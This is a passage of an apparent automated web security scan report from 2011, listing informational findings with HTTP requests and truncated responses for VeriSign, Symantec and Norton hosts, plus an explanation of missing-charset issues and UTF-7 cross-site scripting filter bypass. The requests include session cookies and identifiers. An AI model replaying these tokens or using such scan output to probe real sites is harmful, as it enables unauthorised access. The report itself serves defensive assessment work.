Certain
Host:
https://securitycenter.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE1WkhKCKMQP1p2JJzrZf2h3PXz1qghWLRzUhS1WUJUiNzxbzTT!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:41 GMT Content-length: 129 Content-type: text/html Last-modified: Thu, 23 Dec 2004 19:39:49 GMT Etag: "81-41cb1f05" Accept-ranges: bytes <html> <head> <meta http-equiv="Refresh" content="0; url=https://www.verisign.com/products/site/"> </head> <body></body> </html>
21.54. https://securitycenter.verisign.com/celp/enroll/outsideSearch
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/outsideSearch
Request
GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/ Connection: close <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <title> Search for SSL or Code Signing Certificates from VeriSig...[SNIP]...
21.55. https://test-products.verisign.com/geocenter/reseller/logon.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://test-products.verisign.com
Path:
/geocenter/reseller/logon.do
Request
GET /geocenter/reseller/logon.do HTTP/1.1 Host: test-products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:46 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 17100 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]...
21.56. https://us.norton.com/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://us.norton.com
Path:
/index.jsp
Request
GET /index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=2601 Date: Fri, 09 Sep 2011 21:47:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 90635 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Norton - Antivirus Software, Spyware Protection and Personal Firewall by Sym...[SNIP]...
21.57. https://vipmobile.verisign.com/home.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vipmobile.verisign.com
Path:
/home.v
Request
GET /home.v HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:52:06 GMT Server: Apache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 16260 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]...
21.58. https://vipmobile.verisign.com/supportedphones.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vipmobile.verisign.com
Path:
/supportedphones.v
Request
GET /supportedphones.v HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:46 GMT Server: Apache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 1508897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]...
21.59. https://www-secure.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1117 Date: Fri, 09 Sep 2011 21:47:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42824 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solut...[SNIP]...
21.60. https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/about/profile/policies/eulas/index.jsp
Request
GET /about/profile/policies/eulas/index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1717 Date: Fri, 09 Sep 2011 21:47:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 98373 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Product License Agreements - Symantec Corp.</title> <meta http-equiv="Conten...[SNIP]...
21.61. https://www-secure.symantec.com/about/profile/policies/legal.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/about/profile/policies/legal.jsp
Request
GET /about/profile/policies/legal.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1694 Date: Fri, 09 Sep 2011 21:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 59713 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Legal Notices</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Conten...[SNIP]...
21.62. https://www-secure.symantec.com/about/profile/policies/privacy.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/about/profile/policies/privacy.jsp
Request
GET /about/profile/policies/privacy.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1721 Date: Fri, 09 Sep 2011 21:47:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82442 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Complete Privacy Policy - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"...[SNIP]...
21.63. https://www-secure.symantec.com/business/theme.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/business/theme.jsp
Request
GET /business/theme.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1688 Date: Fri, 09 Sep 2011 21:47:38 GMT Content-Length: 0 Connection: close
21.64. https://www-secure.symantec.com/feedback/contactus.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/feedback/contactus.jsp
Request
GET /feedback/contactus.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1684 Date: Fri, 09 Sep 2011 21:47:32 GMT Content-Length: 29862 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Contact Us - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http...[SNIP]...
21.65. https://www-secure.symantec.com/feedback/webmaster.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/feedback/webmaster.jsp
Request
GET /feedback/webmaster.jsp?theURL= HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1677 Date: Fri, 09 Sep 2011 21:47:32 GMT Content-Length: 24273 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Report a Broken Link - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...[SNIP]...
21.66. https://www-secure.symantec.com/globalsites/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/globalsites/index.jsp
Request
GET /globalsites/index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1722 Date: Fri, 09 Sep 2011 21:47:39 GMT Content-Length: 23505 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Global Sites - Symantec Corp.</title> <meta http-equiv="Content-Type" conten...[SNIP]...
21.67. https://www-secure.symantec.com/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/index.jsp
Request
GET /index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1720 Date: Fri, 09 Sep 2011 21:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42824 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solut...[SNIP]...
21.68. https://www-secure.symantec.com/rss/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/rss/index.jsp
Request
GET /rss/index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1694 Date: Fri, 09 Sep 2011 21:47:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38409 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>RSS - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv=...[SNIP]...
21.69. https://www-secure.symantec.com/sitemap/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/sitemap/index.jsp
Request
GET /sitemap/index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8Cache-Control: public, max-age=1616 Date: Fri, 09 Sep 2011 21:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33953 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Site Map: Information Security - Computer Security Solutions and Services | Symantec Corp</title> <meta http-equiv=...[SNIP]...
21.70. https://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]...
21.71. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.custom.js
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 985 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
21.72. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 4102 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
21.73. https://www.verisign.com/products-services/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/products-services/index.html
Request
GET /products-services/index.html HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://securitycenter.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:46 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 107427 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee...[SNIP]...
22. HTML does not specify charset
previous
next
There are 63 instances of this issue:
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters. In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1 .
22.1. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/assets/fonts/samd____-webfont.woff
Request
GET /assets/fonts/samd____-webfont.woff HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Server: Apache ETag: "2ef819b-7544-4a59eedb01b80" Accept-Ranges: bytesContent-Type: text/html Age: 3152 Date: Fri, 09 Sep 2011 21:27:10 GMT Last-Modified: Mon, 13 Jun 2011 21:51:58 GMT Expires: Sun, 09 Oct 2011 13:52:54 GMT Content-Length: 30020 Connection: keep-alive wOFF......uD................................FFTM............\...GDEF........... ....GPOS..........7&[0{.GSUB.......,...0....OS/2.......R...`x..fcmap...D...r....y0..cvt .......2...2 o..fpgm...........e...[SNIP]...
22.2. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/authweb/en_ch/assets/shared/js/google-analytics.js
Request
GET /authweb/en_ch/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, publicContent-Type: text/html Vary: Accept-Encoding Age: 27500 Date: Fri, 09 Sep 2011 21:25:03 GMT Expires: Sun, 09 Oct 2011 13:46:43 GMT Content-Length: 460 Connection: keep-alive var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.ch']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scri...[SNIP]...
22.3. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Request
